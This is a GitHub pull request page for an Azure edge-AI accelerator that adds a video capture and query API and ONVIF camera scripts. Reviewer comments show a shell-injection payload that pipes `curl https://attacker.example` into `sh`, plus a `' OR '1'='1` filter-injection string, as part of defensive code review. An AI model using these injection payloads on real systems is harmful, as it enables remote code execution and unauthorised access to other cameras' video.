feat(application): add video capture query blueprint, 520-video-query-api, and ONVIF camera tooling#468
feat(application): add video capture query blueprint, 520-video-query-api, and ONVIF camera tooling#468auyidi1 wants to merge 18 commits into
Conversation
…ources ## Summary Add diagnostic settings across blueprint resources, per CRISP security review findings LT-4 (Medium). Supports Threat #24: Insufficient logging and monitoring. Defender for Cloud (LT-1) is intentionally **not** managed here — it's subscription-scoped and should be enforced via Azure Policy by platform teams. ### Changes **Diagnostic Settings (LT-4)** — `azurerm_monitor_diagnostic_setting` in each component: - **Key Vault**: AuditEvent + AllMetrics - **ACR**: ContainerRegistryRepositoryEvents, ContainerRegistryLoginEvents + AllMetrics - **Event Grid**: allLogs + AllMetrics - **Event Hubs**: allLogs + AllMetrics ### Scope - Components: `010-security-identity`, `060-acr`, `040-messaging` - Blueprints: full-single-node, full-multi-node, azure-local, only-cloud, robotics - 19 files changed, 227 insertions ### Design Decisions - Diagnostics gated by `should_enable_diagnostic_settings` (bool) + `log_analytics_workspace_id` — enabled automatically when blueprints wire observability - Component-level ownership: each module manages its own diagnostic settings - Defender left to Azure Policy to avoid subscription-scoped side effects on `terraform destroy` ### Deploy Validation (2026-04-08) Rebased on `dev` and deployed 3 affected blueprints in parallel: | Blueprint | Region | Diagnostic Settings | Result | |---|---|---|---| | full-single-node-cluster | eastus2 | ✅ KV, ACR, EG, EH | All diagnostic resources created. IoT Ops proxy timeout (pre-existing) | | only-cloud-single-node-cluster | westus2 | ✅ ACR, EG, EH | All diagnostic resources created. KV contacts timeout (pre-existing transient) | | robotics | westus3 | ✅ ACR, EG, EH, KV | All diagnostic resources created. Grafana SSL EOF (pre-existing transient) | All diagnostic settings deployed successfully. All failures are pre-existing environmental issues unrelated to this change. Skipped: `full-multi-node-cluster` (pre-existing count issue), `azure-local` (requires HCI hardware). Fixes AB#1984 ---- #### AI description (iteration 5) #### PR Classification Feature enhancement to add diagnostic settings for Azure blueprint resources (ACR, Key Vault, Event Grid, Event Hubs) to address CRISP security findings LT-4 regarding insufficient logging and monitoring. #### PR Summary This PR implements diagnostic settings across Key Vault, ACR, Event Grid, and Event Hubs modules to enable audit logging and metrics collection to Log Analytics workspaces, addressing security compliance gaps. All changes are gated by optional variables and wire the Log Analytics workspace ID from observability modules through blueprint configurations. - Added `azurerm_monitor_diagnostic_setting` resources in `main.tf` files for Key Vault (AuditEvent), ACR (ContainerRegistryRepositoryEvents, ContainerRegistryLoginEvents), Event Grid (allLogs), and Event Hubs (allLogs) with AllMetrics enabled - Introduced `log_analytics_workspace_id` and `should_enable_diagnostic_settings` variables across all affected modules ...
… RBAC for connectedk8s proxy ## Summary Adds Entra ID group-based cluster admin support and Azure Arc RBAC role assignments to the CNCF K3s cluster component, enabling `az connectedk8s proxy` for team members. ## Problem - `az connectedk8s proxy` failed for non-deploying users — no Azure RBAC roles on the Arc resource - Only the deploying user received cluster-admin via individual OID/UPN - No support for Entra ID groups ## Changes ### New variable: `cluster_admin_group_oid` - Accepts an Entra ID group Object ID - Creates Kubernetes `ClusterRoleBinding` with `--group` flag (k3s-device-setup.sh) - Assigns Azure Arc RBAC roles on the Arc connected cluster resource ### Azure Arc RBAC role assignments (new) - `Azure Arc Kubernetes Viewer` — assigned to both user OID and group OID - `Azure Arc Enabled Kubernetes Cluster User Role` — assigned to both user OID and group OID - Scoped to the Arc connected cluster resource - Only created after the cluster exists (static count guard with `has_arc_cluster`) ### Cleanup - Removed `deploy-cluster-admin-oid.sh` — superseded by Terraform automation ### Files changed - `src/100-edge/100-cncf-cluster/terraform/` — variables, main.tf, ubuntu-k3s module, role-assignments module - `src/100-edge/100-cncf-cluster/scripts/k3s-device-setup.sh` — group ClusterRoleBinding - `src/100-edge/110-iot-ops/scripts/deploy-cluster-admin-oid.sh` — deleted - All 5 blueprints — expose `cluster_admin_group_oid` ## Usage ```hcl cluster_admin_group_oid = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" ``` ## Deployment Testing All affected blueprints deployed and verified (Arc clusters Connected): | Blueprint | Region | Result | |---|---|---| | full-single-node-cluster | eastus2 | ✅ Arc Connected | | minimum-single-node-cluster | australiaeast | ✅ Arc Connected | | partial-single-node-cluster | swedencentral | ✅ Arc Connected | | dual-peered-single-node-cluster | westus3 | ✅ Both clusters Arc Connected | Only pre-existing failures observed: - IoT Ops sync rules (`LinkedAuthorizationFailed`) — known issue, unrelated to this PR - Grafana dashboard import script — transient 412 errors ---- #### AI description (iteration 12) #### PR Classification This PR adds new functionality to enable Entra ID group-based cluster admin access and Azure Arc RBAC support for connectedk8s proxy operations. #### PR Summary Adds support for granting cluster-admin permissions to an entire Entra ID group and assigns required Azure Arc RBAC roles to enable `az connectedk8s proxy` access for group members. - `k3s-device-setup.sh`: Added `CLUSTER_ADMIN_GROUP_OID` environment variable and logic to create ClusterRoleBinding for Entra ID groups with cluster-admin permissions - `terraform/main.tf`: Added Arc RBAC role assignments (`Azure Arc Kubernetes Viewer` and `Azure Arc Enabled Kubernetes Cluster User Role`) for both individual users and Entra ID groups on the Arc connected cluster resource - All Terraform variable files: Added `cluster_admin_group_oid` variable to specify the Entra ...
## Summary Fixes deployment issues discovered during parallel blueprint testing. Each of the 9 deployable blueprints was tested 4 times across different Azure regions (36 total deployments, all successful). ## Fixes ### 1. Grafana dashboard import fails on re-apply and fresh deploy (`020-observability`) **Problem:** `az grafana dashboard import` fails in two ways: (a) 412 version-mismatch when dashboards already exist on retry, and (b) SSL EOF errors when Grafana's SSL cert isn't ready on fresh deploys. **Fix:** Add `--overwrite` flag to all import calls, plus retry logic (10 attempts, 30s delay) to wait for SSL cert provisioning. ### 2. AzureML compute cluster requires public IPs without private endpoints (`080-azureml`) **Problem:** `compute_cluster_node_public_ip_enabled` defaults to `false`, but Azure ML requires workspace private endpoints when node public IPs are disabled. ### 3. dpkg lock race condition on VM first boot (`100-cncf-cluster`) **Problem:** `k3s-device-setup.sh` used `curl | bash` to install Azure CLI, which runs internal `apt-get` calls without lock timeout handling. Ubuntu's `unattended-upgrades` holds the dpkg lock on first boot, causing exit code 100. **Fix:** Replace `curl | bash` with inline `apt-get` calls, each using `DPkg::Lock::Timeout=300`. Eliminates the TOCTOU race entirely — no external installer with uncontrolled apt calls. ### 4. Default VM SKUs unavailable in most regions **Problem:** `Standard_D8ds_v5` (AKS node default) available in only 2/9 IoT Operations regions. `Standard_D8s_v3` (VM host default) same. `Standard_D4_v4` (minimum blueprint) same. **Fix:** Update all defaults to v6 series — available in 8/9 or 9/9 regions. ## Deployment Test Results — 36/36 Successful Each blueprint deployed 4 times in different regions: | Blueprint | R1 | R2 | R3 | R4 | |---|---|---|---|---| | only-output-cncf-cluster-script | ✅ westus | ✅ eastus2 | ✅ westeurope | ✅ southcentralus | | only-cloud-single-node-cluster | ✅ germanywestcentral | ✅ westus3 | ✅ westus3 | ✅ southcentralus | | minimum-single-node-cluster | ✅ westus | ✅ eastus2 | ✅ eastus2 | ✅ northeurope | | full-single-node-cluster | ✅ germanywestcentral | ✅ westus | ✅ southcentralus | ✅ westus2 | | partial-single-node-cluster | ✅ westus3 | ✅ germanywestcentral | ✅ westus | ✅ eastus2 | | dual-peered-single-node-cluster | ✅ eastus2 | ✅ southcentralus | ✅ southcentralus | ✅ southcentralus | | full-multi-node-cluster | ✅ eastus2 | ✅ westus3 | ✅ westeurope | ✅ westus | | azureml | ✅ southcentralus | ✅ westus | ✅ germanywestcentral | ✅ westus2 | | robotics | ✅ germanywestcentral | ✅ westus | ✅ westus2 | ✅ westeurope | **Skipped:** fabric (requires Fabric capacity), azure-local (requires Azure Local hardware) ## Changed Files - `src/000-cloud/020-observability/scripts/import-grafana-dashboards.sh` — overwrite + retry logic - `src/000-cloud/080-azureml/terraform/variables.tf` — keep secure default - `blueprints/modules/robotics/terraform/main.tf` — der...
Resolves conflicts: - import-grafana-dashboards.sh: kept dev version (retry wrapper, --overwrite) - k3s-device-setup.sh: kept dev version (install_azure_cli helper, Entra group OID, apt lock timeouts) - deploy-cluster-admin-oid.sh: kept deletion (refactored into k3s-device-setup.sh in PR 624)
- Add 520-video-query-api Azure Function for time-based video queries - Upgrade 503-media-capture-service with multi-trigger, ACSA writer, continuous recorder - Add video-capture-query blueprint with architecture diagrams - Add ONVIF camera quickstart, deployment scripts, and testing guides - Add ADR 006: dual-component video architecture - Add continuous video capture ACSA sync ADR - Update 030-data storage-account with primary_blob_endpoint output
- Fix secretlint: remove embedded basic auth credentials from RTSP URL example - Fix cspell: add ffprobe, guestconfiguration, ultrafast, vidcap, videocapture to dictionary - Fix shellcheck: SC2162 (read -r), SC2155 (local declare/assign), SC2181 (direct exit check), SC2002 (useless cat) - Fix shfmt: apply consistent formatting across all 111-assets shell scripts - Fix markdownlint MD036: convert bold emphasis to proper headings - Fix markdownlint MD040: add language specifiers to fenced code blocks - Fix markdownlint MD033: wrap angle-bracket placeholders in backticks - Fix markdownlint MD025: convert duplicate H1 to H2 - Fix markdownlint MD024: rename duplicate heading - Fix markdownlint MD029: correct ordered list numbering
- Fix cspell: add 15 domain words (Amcrest, Reolink, dtmi, anyauth, etc.)
- Fix ruff: auto-fix 48 errors + noqa S324 (non-crypto md5), S603 (trusted ffmpeg)
- Fix ruff: add S108/S603/S607 to test file ignores in .ruff.toml
- Fix shfmt: format install-ffmpeg.sh
- Fix markdown-table-formatter: 4 files reformatted
- Fix tflint: eventhubs default null → {} in full-single-node-cluster
All 8 megalinter linters validated locally before push.
- Move ONVIF quickstart to docs/getting-started/onvif-camera-quickstart.md - Remove 4 redundant markdown files from 111-assets (1,956 lines): - ONVIF-CAMERA-QUICKSTART.md (1,015 lines — duplicated content) - terraform/ONVIF-CAMERA-DEPLOYMENT.md (465 lines — deployment log) - terraform/ONVIF-CAMERA-QUICK-REFERENCE.md (230 lines — overlap) - scripts/TESTING-ONVIF-CAMERAS.md (246 lines — overlap) - Genericize scripts/README.md: replace vendor-specific names with placeholders - Add ONVIF camera quickstart link to docs/getting-started/README.md - New consolidated guide: vendor-neutral, covers Bicep/Terraform/scripts
- Fix cspell: add ultrafast to general-technical dictionary - Fix ruff: auto-fix import sorting + line-length in data-scientist-workflow.py - Fix yamllint: reformat media-capture-mqtt-triggered.yaml indentation and add document start All 7 megalinter linters validated locally before push.
…-cluster Add should_deploy_video_capture toggle, function runtime version pass-through variables, video_capture_computed_settings local, and Storage Blob Data Contributor role assignment to the full-single-node-cluster blueprint. Create video-capture-query.tfvars.example demonstrating Python 3.11 runtime configuration with mutual-exclusion documentation for Node.js-based notification functions.
- replace datetime.utcnow() with datetime.now(UTC) across all instances - use ManagedIdentityCredential(client_id=client_id) consistently with AZURE_CLIENT_ID fallback 🔧 - Generated by Copilot
Dependency ReviewThe following issues were found:
Vulnerabilitiessrc/500-application/520-video-query-api/requirements.txt
Only included vulnerabilities with severity high or higher. License Issuessrc/500-application/520-video-query-api/requirements.txt
OpenSSF Scorecard
Scanned Files
|
📚 Documentation Health ReportGenerated on: 2026-05-02 00:36:09 UTC 📈 Documentation Statistics
🏗️ Three-Tree Architecture Status
🔍 Quality Metrics
This report is automatically generated by the Documentation Automation workflow. |
rezatnoMsirhC
left a comment
There was a problem hiding this comment.
Thank you for a well-structured contribution. The overall architecture is solid and the consistent application of diagnostic settings, VM SKU upgrades, Arc RBAC role assignments, and the ignore-scripts=true addition are all good improvements. Left a few comments on security issues that should be addressed before merging.
| export INSTALL_K3S_VERSION="$K3S_VERSION" | ||
| export K3S_TOKEN | ||
| export K3S_URL | ||
| curl -sfL https://get.k3s.io | sh - |
There was a problem hiding this comment.
The previous implementation downloaded the k3s binary to /tmp, fetched the accompanying sha256sum-amd64.txt, and verified the checksum before installing with INSTALL_K3S_SKIP_DOWNLOAD=true. The code comments even explicitly flagged this as satisfying the OSSF Scorecard pinned-dependencies control. This PR replaces that with a direct pipe-to-shell:
curl -sfL https://get.k3s.io | sh -This removes integrity verification entirely. If the k3s CDN or the release download were compromised between the fetch and execution, the binary would run on edge devices without any checksum check. kubectl similarly lost its sha256 verification and is now resolved to "latest stable" at install time rather than a pinned version, meaning repeated runs of the script can produce different kubectl versions across machines.
Please restore the previous download-verify-then-install pattern for both k3s and kubectl. The CLUSTER_ADMIN_GROUP_OID additions in this function are otherwise clean.
| read -r -p "$(echo -e "${YELLOW}${prompt}${NC}: ")" value | ||
| fi | ||
|
|
||
| eval "$var_name='$value'" |
There was a problem hiding this comment.
The prompt_input function uses eval to assign a user-supplied value to a named variable:
eval "$var_name='$value'"If $value contains a single quote, the eval statement breaks out of the string context. A camera password like pass'word causes a syntax error; a crafted value like '; curl https://attacker.example | sh; FOO=' executes arbitrary commands with the user's privileges. These scripts prompt for ONVIF credentials, making the password field a realistic attack surface (OWASP A03:2021).
Replace eval with a bash nameref, which achieves the same dynamic assignment without shell interpretation:
prompt_input() {
local prompt_text="$1"
local default="$2"
local -n _target="$3" # nameref -- no eval needed
read -r -p "${prompt_text} [${default}]: " value
_target="${value:-$default}"
}No changes to callers are required. The same issue exists in deploy-onvif-camera-terraform.sh at the equivalent line.
| Returns: | ||
| List of blob metadata dictionaries | ||
| """ | ||
| query = ( | ||
| f"camera_id='{camera_id}' AND " | ||
| f"start_time>='{start_time.isoformat()}' AND " | ||
| f"end_time<='{end_time.isoformat()}'" | ||
| ) | ||
|
|
There was a problem hiding this comment.
The camera_id value comes directly from req.params.get('camera') and is checked only for presence before being embedded in the blob index tag filter expression:
query = (
f"camera_id='{camera_id}' AND "
f"start_time>='{start_time.isoformat()}' AND "
f"end_time<='{end_time.isoformat()}'"
)
container.find_blobs_by_tags(filter_expression=query)A crafted camera query parameter containing a single quote (e.g., ' OR '1'='1) can break out of the intended filter and potentially return blobs from other camera feeds. The trigger endpoint in this same file correctly validates against ALLOWED_CAMERAS; the query endpoint should apply equivalent input validation.
A simple regex guard before the blob listing call is sufficient:
import re
if not re.fullmatch(r'[a-zA-Z0-9_\-]+', camera_id):
return func.HttpResponse(
json.dumps({"error": "Invalid camera_id format"}),
status_code=400,
mimetype="application/json",
)Security fixes for reviewer-flagged issues:
- Restore verified-download pattern for k3s and kubectl with SHA-256 checks
in k3s-device-setup.sh (regression introduced by upstream cleanup);
switch az login from --username to --client-id for managed identity flow.
- Replace eval-based variable assignment with bash namerefs in
deploy-onvif-camera-{bicep,terraform}.sh to prevent shell injection from
user-supplied ONVIF credentials.
- Validate camera_id parameter with a regex in the Video Query API to
prevent injection into Azure Blob index tag filter expressions across
camera feeds.
- Bump cryptography to >=46.0.5 (GHSA-r6ph-v2qm-q3c2).
- Pin paho-mqtt for the Video Query API runtime so MQTT publish works.
CI failures resolved:
- Revert pure-whitespace reformatting in 4 shell scripts so shfmt --diff
exits clean against repo defaults.
- Wire up should_deploy_video_capture, function_node_version, and
function_python_version in blueprints/full-single-node-cluster/terraform
(tflint unused-declaration warnings); add the previously-orphaned Storage
Blob Data Contributor role assignment for the Video Query Function App.
- Regenerate terraform-docs READMEs for affected blueprints.
- Escape '<' before digits in continuous-video-capture-acsa-sync.md so
Docusaurus MDX parsing succeeds.
- Strip /en-us language segments from learn.microsoft.com URLs.
- Add 23 domain-specific words to .cspell/project-specific.txt.
Description
Closes #467
Adds a complete video capture and time-based query pipeline to the edge-ai accelerator. This introduces continuous 24/7 video recording from ONVIF/RTSP cameras at the edge with cloud storage, lifecycle management, and a REST API for data scientists to retrieve historical video segments by camera, location, and timeframe.
Mirrors ADO PR #616.
Architecture
Changes
New Components
src/500-application/520-video-query-api/— Azure Function with REST endpoints for time-based video queries, SAS URL generation, optimized blob filtering (<1h: prefix-based, 1-24h: blob index tags), MQTT-triggered capture, and health monitoringblueprints/video-capture-query/— Complete Terraform blueprint with architecture diagrams (6 drawio/mermaid), example tfvars, data scientist workflow example, and deployment documentationEnhanced Components
src/500-application/503-media-capture-service/— Continuous recording mode, ACSA (Azure Connected Storage Account) writer, multi-trigger support (binary + MQTT), video processor improvementssrc/500-application/508-media-connector/— Updated docker-compose, mock RTSP camera Kubernetes manifestssrc/100-edge/111-assets/scripts/— ONVIF camera deployment scripts (Bicep + Terraform), PTZ profile discovery, quick PTZ test utilitiesDocumentation
docs/getting-started/onvif-camera-quickstart.md— Step-by-step ONVIF camera deployment guideproject-adrs/Accepted/006-dual-component-video-architecture.md— ADR for dual-component video architecture (503 recording + 508 streaming)docs/solution-adr-library/— Continuous video capture with ACSA sync, edge video streaming and image capture, updated ONVIF connector camera integrationBlueprint Integration
blueprints/full-single-node-cluster/— Video capture query variables, outputs, andvideo-capture-query.tfvars.exampleBuild & Code Quality
Files Changed
109 files (13,221 additions, 786 deletions) across the following areas:
src/500-application/520-video-query-api/blueprints/video-capture-query/src/500-application/503-media-capture-service/src/100-edge/111-assets/scripts/docs/getting-started/docs/solution-adr-library/project-adrs/Accepted/blueprints/full-single-node-cluster/terraform/Testing
test_video_query_api.py, 377 lines)